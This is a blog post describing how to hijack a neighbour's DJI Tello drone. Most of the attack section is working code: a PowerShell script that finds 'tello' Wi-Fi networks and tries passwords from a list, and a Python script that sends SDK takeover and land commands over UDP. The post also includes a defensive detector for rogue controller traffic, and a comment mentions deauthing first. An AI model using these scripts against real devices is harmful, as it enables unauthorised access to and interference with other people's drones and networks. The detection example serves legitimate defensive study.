Wednesday, 15 July 2020

Grounding drones - Tello DJI

A while ago I was reading a bit about drones. Recently I decided to look at it again, just to summarize it. Below you will find a few notes. Here we go...
Today we'll start here (1, 2... 1,2,free,for:): ;]



Today we'll plan a mission ;> (let's say) "for a neighbour" ;) who is watching us using his/her drones (a little bit "too much" in our opinion). So? ;] Let's start from the page mentioned in the last post about the Tello drone(s).


Using the sample code we can assume a simple scenario:

- our 'suspected neighbour' is watching us ;[
- we don't want it in our 'castle'. ;]


The environment (;]) looks pretty simple:
- we can 'see' (e.g. via wifi sniffing/listening) that the drone (by default readable as the 'tello' bssid) is 'near' us
- we can 'guess' the password (in default mode the Tello drone starts without any password)

Scenario:
- (we won't talk about wifi hacking here, sorry ;]) we can connect to the drone's wifi ("tello" for our purposes)
- we can get an IP address in 'that network' (AP).

Easy as that. So now we should be somewhere here - first stage: connecting to the drone:

I was wondering (for 2 weeks ;]) how I can use python to connect/read/get/anything related to:
- reading (wifi) interfaces
- if a bssid is found -> connect (using xyz:credentials)...

After a while (read as: checking, installing and excluding a lot of different packages for Windows/Linux... ;)) I figured out that (I'm using Windows + VMWare), so ;> I can use PowerShell! ;D
Yep... Anyway. ;]

Starting from the connection (using the PS1 found here - thanks!) we should be here:


The modified code I used during my tests is presented below:

---<code>---
# run netsh and keep only the lines that mention a 'tello' network
$netsh = netsh.exe wlan show networks mode=bssid | findstr /i "tello"
if (-not $netsh) {
    write-output "[-] No 'tello*' network in range"
    exit
}

# netsh prints 'SSID <n> : <name>'; take the first match and the part after the colon
$ssidname = $netsh | select-string -pattern '^\s*SSID' | select-object -first 1
$ssid = ("$ssidname" -split ':\s*', 2)[1].Trim()

# if there is a 'tello*' wifi network, we can proceed
write-output "[+] Found SSID: $ssid"


##
# read passwords from file:
$passwdFile = ".\sample_passwords.txt"
$regex = '\S'   # skip blank lines in the password file
write-output $passwdFile

foreach($line in Get-Content $passwdFile) {
    if($line -match $regex){
        $line = $line.Trim()
        write-output "Checking password: $line"

        ###
        # Fill in mandatory details for the WiFi network
        $WirelessNetworkSSID = $ssid # 'TELLO'
        $WirelessNetworkPassword = $line # '12345678'
        $Authentication = 'WPA2PSK' # Could be WPA2
        $Encryption = 'AES'

        # Create the WiFi profile, set the profile to auto connect
        $WirelessProfile = @'
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
    <name>{0}</name>
    <SSIDConfig>
        <SSID>
            <name>{0}</name>
        </SSID>
    </SSIDConfig>
    <connectionType>ESS</connectionType>
    <connectionMode>auto</connectionMode>
    <MSM>
        <security>
            <authEncryption>
                <authentication>{2}</authentication>
                <encryption>{3}</encryption>
                <useOneX>false</useOneX>
            </authEncryption>
            <sharedKey>
                <keyType>passPhrase</keyType>
                <protected>false</protected>
                <keyMaterial>{1}</keyMaterial>
            </sharedKey>
        </security>
    </MSM>
</WLANProfile>
'@ -f $WirelessNetworkSSID, $WirelessNetworkPassword, $Authentication, $Encryption

        # Create the XML file locally
        $random = Get-Random -Minimum 1111 -Maximum 99999999
        $tempProfileXML = "$env:TEMP\tempProfile$random.xml"
        $WirelessProfile | Out-File $tempProfileXML

        # Add the WiFi profile and connect (netsh is run synchronously here, so the
        # connection state check below only happens after netsh has finished)
        netsh.exe wlan add profile filename="$tempProfileXML" | Out-Null
        netsh.exe wlan connect name="$WirelessNetworkSSID" | Out-Null
        Remove-Item $tempProfileXML -ErrorAction SilentlyContinue

        ####

        # give the adapter a moment to associate, then check the interface state
        # (both 'State : connected' and the SSID we asked for must be present)
        Start-Sleep -Seconds 5
        $ifaces = netsh.exe wlan show interfaces
        $connected = ($ifaces | select-string -pattern '^\s*State\s*:\s*connected') -and
                     ($ifaces | select-string -pattern "^\s*SSID\s*:\s*$([regex]::Escape($ssid))")
        if($connected) {
            write-output "YEEEEEEEEAH! WE ARE CONNECTED TO THE DRONE TELLO! ;]"
            break
        } else {
            write-output "[-] Not connected with that password, trying the next one"
        }
    }
}

---</code>---

(Assuming we are connected) we can now use another 'sample code' (which I found here - thanks!).

The modified version is presented in the screenshot below (again I was looking for a while for 'some python package' that I could use... and that's how I found... the way to "use it": using only plain python sockets (which is what I was looking for from the beginning, tbh)):



Copy/paste version:

---<code>---
c@kali:~/src/telloh$ cat get_down.py
#!/usr/bin/env python3
import socket
import sys
import time

if len(sys.argv) != 2:
    print('Usage: %s <drone-ip>' % sys.argv[0])
    sys.exit(1)

target = sys.argv[1]
tello = (target, 8889)  # Tello SDK command port (UDP)


def init_drone():
    print('[?] Connecting to the target drone: %s' % target)
    # create a UDP client socket on the PC (UDP is connectionless, so
    # nothing is sent yet; the 'connection' is just a local socket)
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        print('[+] Connected to the target drone: %s' % target)
    except socket.error as err:
        print(err)
        sys.exit(1)

    try:
        # 'command' switches the drone into SDK mode; every SDK message is
        # a plain ASCII string, which has to be sent as bytes in Python 3
        print('[i] Trying to take over the control... :>')
        s.sendto(b'command', tello)
        time.sleep(2)
    except socket.error as err:
        print(err)

    return s


def takeoff(s):
    s.sendto(b'takeoff', tello)
    time.sleep(5)


def land(s):
    print('[i] Sending LAND mission to the drone ;)')
    s.sendto(b'land', tello)
    time.sleep(3)


def main():
    s = init_drone()
    takeoff(s)
    print('[!] Landing in progress...')
    land(s)
    s.close()


if __name__ == '__main__':
    main()
c@kali:~/src/telloh$


---</code>---

Now. The idea is simple: as you can see, the connection is in (let's call it) async mode.

Why it is important: because in the normal (drone-using) scenario the mobile app connects (async) to the drone. "We" (using the presented basic/example code) cannot do that. So: try restarting your script if you have no luck taking over the drone ;)
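What the script above relies on is also what makes this traffic easy to spot on the drone's network: a few plain ASCII datagrams to UDP/8889 from a host that is not the paired phone. As an added example (not from the post and not part of the Tello SDK), here is a small detector that runs over constructed datagram records, such as you might export from a capture on the 192.168.10.x network, and flags SDK control commands from any host other than the expected controller; the command list is the Tello SDK list as I know it and the record format is this example's own.

```python
# Added example (not from the post): flag Tello SDK control datagrams that do
# not come from the single controller we expect, e.g. the owner's phone.
from collections import namedtuple

TELLO_CMD_PORT = 8889              # SDK command channel used by get_down.py above
DRONE_NET_PREFIX = "192.168.10."   # default Tello AP subnet mentioned in the post
# State-changing SDK commands (from the Tello SDK list as I know it, an assumption
# to extend for your firmware); read-only queries such as 'battery?' are left out.
FLIGHT_COMMANDS = {"command", "takeoff", "land", "emergency", "up", "down",
                   "left", "right", "forward", "back", "cw", "ccw", "flip",
                   "go", "curve", "rc"}

# One UDP datagram from a capture: timestamp (s), src/dst IPv4, dst UDP port,
# payload bytes. The record format is this example's own, not a pcap reader.
Datagram = namedtuple("Datagram", "ts src dst dport payload")

def classify(dg):
    """Return the SDK command word if dg is a Tello control message, else None."""
    if dg.dport != TELLO_CMD_PORT or not dg.dst.startswith(DRONE_NET_PREFIX):
        return None
    try:
        word = dg.payload.decode("ascii").strip().split(" ", 1)[0].lower()
    except UnicodeDecodeError:
        return None
    return word if word in FLIGHT_COMMANDS else None

def find_rogue_controllers(datagrams, allowed_src):
    """Return (ts, src, command) for every control message not sent by allowed_src."""
    alerts = []
    for dg in datagrams:
        cmd = classify(dg)
        if cmd is not None and dg.src != allowed_src:
            alerts.append((dg.ts, dg.src, cmd))
    return alerts

# Constructed sample: the paired phone (.2) flies normally, then a second host
# (.3) enters SDK mode and lands the drone, the sequence get_down.py sends.
SAMPLE = [
    Datagram(0.0, "192.168.10.2", "192.168.10.1", 8889, b"command"),
    Datagram(0.5, "192.168.10.1", "192.168.10.2", 9000, b"ok"),        # drone reply
    Datagram(1.0, "192.168.10.2", "192.168.10.1", 8889, b"takeoff"),
    Datagram(2.0, "192.168.10.2", "192.168.10.1", 8889, b"battery?"),  # read-only query
    Datagram(8.0, "192.168.10.3", "192.168.10.1", 8889, b"command"),
    Datagram(10.0, "192.168.10.3", "192.168.10.1", 8889, b"takeoff"),
    Datagram(15.0, "192.168.10.3", "192.168.10.1", 8889, b"land"),
]

if __name__ == "__main__":
    for ts, src, cmd in find_rogue_controllers(SAMPLE, "192.168.10.2"):
        print(f"[!] t={ts:5.1f}s unexpected controller {src} sent '{cmd}'")
```

On the sample it reports the three commands from 192.168.10.3; the same check is the first thing to run when a drone lands on its own and you want to know whether anyone besides the phone was talking to it.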



Checking (
- we are connected; the default IP range is 192.168.10.x;
- we can obtain an IP (my Windows -> VMWare -> Kali -> our_script.py);
):



Looks like it's d(r)one. ;]



Special thanks go to my Patreon: Daniel.
You are AWESOME! ;)



So...

"What's next dude?" ;)

Source


See you next time!

Cheers



2 comments:

  1. Did you manage to simply connect to the drone's AP and send commands to it? I had to deauth first. What is your firmware version?

  2. Hi @Slony:

    1) my way to take over was: drone is online -> I can connect to the drone's AP/wifi -> udp_client.py is sending commands to the drone;

    2) in that case - deauth is not needed (but it's one of the scenarios, true)

    3) firmware of what? ping me privately (twitter/mail) if you want.

    4) thanks for watching :)

    cheers
